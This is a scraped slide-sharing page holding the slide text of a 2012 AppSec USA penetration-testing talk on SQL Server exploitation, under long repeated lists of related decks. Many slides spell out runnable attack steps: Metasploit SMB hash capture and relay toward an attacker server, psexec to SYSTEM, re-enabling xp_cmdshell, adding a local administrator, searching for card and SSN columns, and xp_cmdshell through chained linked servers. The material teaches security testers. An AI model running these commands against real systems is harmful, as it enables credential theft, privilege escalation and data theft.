MySQL database replicationMySQL database replication
MySQL database replicationPoguttuezhiniVP
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonPuppet
 
MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017Dave Stokes
 
Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Conrad Cruz
 
Aeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringAeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringConrad Cruz
 

Similaire à SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012 (20)

TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloud
 
TrinityCore server install guide
TrinityCore server install guideTrinityCore server install guide
TrinityCore server install guide
 
Mysql ppt
Mysql pptMysql ppt
Mysql ppt
 
Mysql all
Mysql allMysql all
Mysql all
 
Mysql all
Mysql allMysql all
Mysql all
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on Windows
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Security features In MySQL 8.0
Security features In MySQL 8.0Security features In MySQL 8.0
Security features In MySQL 8.0
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
Whitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxWhitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on Linux
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 
MySQL database replication
MySQL database replicationMySQL database replication
MySQL database replication
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp Boston
 
MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017
 
Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)
 
Aeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringAeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filtering
 

Plus de Scott Sutherland

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Scott Sutherland
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)Scott Sutherland
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShellScott Sutherland
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360Scott Sutherland
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksScott Sutherland
 

Plus de Scott Sutherland (16)

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 

Dernier

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 

Dernier (20)

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

  • 1. SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
  • 2. Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
  • 3. What are we going to cover? 1. Database entry points 2. Domain user  Database user 3. Database user  OS admin 4. OS admin  Database admin 5. Database admin  OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
  • 4. Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
  • 5. Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
  • 7. Entry Points: Summary asef Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
  • 8. DOMAIN user  DATABASE user Privilege Inheritance
  • 9. Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
  • 10. Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
  • 11. Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
  • 12. Privilege Inheritance: Verify Access Test current user’s access to SQL Servers with osql: FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do osql –E –S %i –Q “select ‘I have access to:’+@@servername”
  • 13. Privilege Inheritance: Verify Access Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> Set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
  • 16. DATABASE USER  OS ADMIN SMB Capture/Relay
  • 17. SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
  • 18. SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
  • 20. SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 21. SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
  • 22. SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 23. SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 24. SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
  • 25. SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
  • 26. SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI Msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
  • 27. SMB Relay: Get Meterpreter Shells
  • 28. SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql –E –Q “what ever you want” If password: • Sign in via RDP • Open a cmd console • osql –E –Q “what ever you want”
  • 29. DEMO
  • 30. Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
  • 31. OS ADMIN  DATABASE ADMIN SQL Server Local Authorization Bypass
  • 32. Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
  • 33. Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
  • 34. Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec –s cmd.exe osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)” Execute queries as sysadmin with SSMS: psexec –i –s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
  • 35. Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
  • 36. Local Auth Bypass: Get Sysadmin Create sysadmin in database using the Metasploit mssql_local_auth_bypass post module: In Meterpeter type “background” to return to msconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
  • 37. SQL Server Auth Bypass: Got Sysadmin asef
  • 38. Do a crazy whale dance! To the left… To the right… Now dive!
  • 39. DATABASE ADMIN  OS ADMIN xp_cmdshell
  • 40. XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
  • 41. XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll";
  • 42. XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure ‘show advanced options’, 1; reconfigure; go; sp_configure ‘xp_cmdshell’, 1; reconfigure; go;
  • 43. XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell ‘net user myadmin MyP@sword1’ EXEC master..xp_cmdshell ‘net localgroup administrators /add myadmin’
  • 45. Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
  • 46. Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
  • 47. Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
  • 48. Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
  • 49. Finding Data: Module Output asef
  • 51. Do a crazy cat disco dance!
  • 53. Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
  • 54. Shared Service Accounts: Diagram asef
  • 55. Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell ‘osql –E –S HVA –Q “select super.secret.data”’ More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking- with-the-osql-utility/
  • 57. Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
  • 58. Database Link Crawling: Diagram asef
  • 59. Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
  • 60. Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
  • 61. Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
  • 62. Database Link Crawling: You Get it! ….You get the point You can follow links until you run out 
  • 63. Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,’SELECT * FROM openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping 192.168.1.1’’’’ ‘’)’)
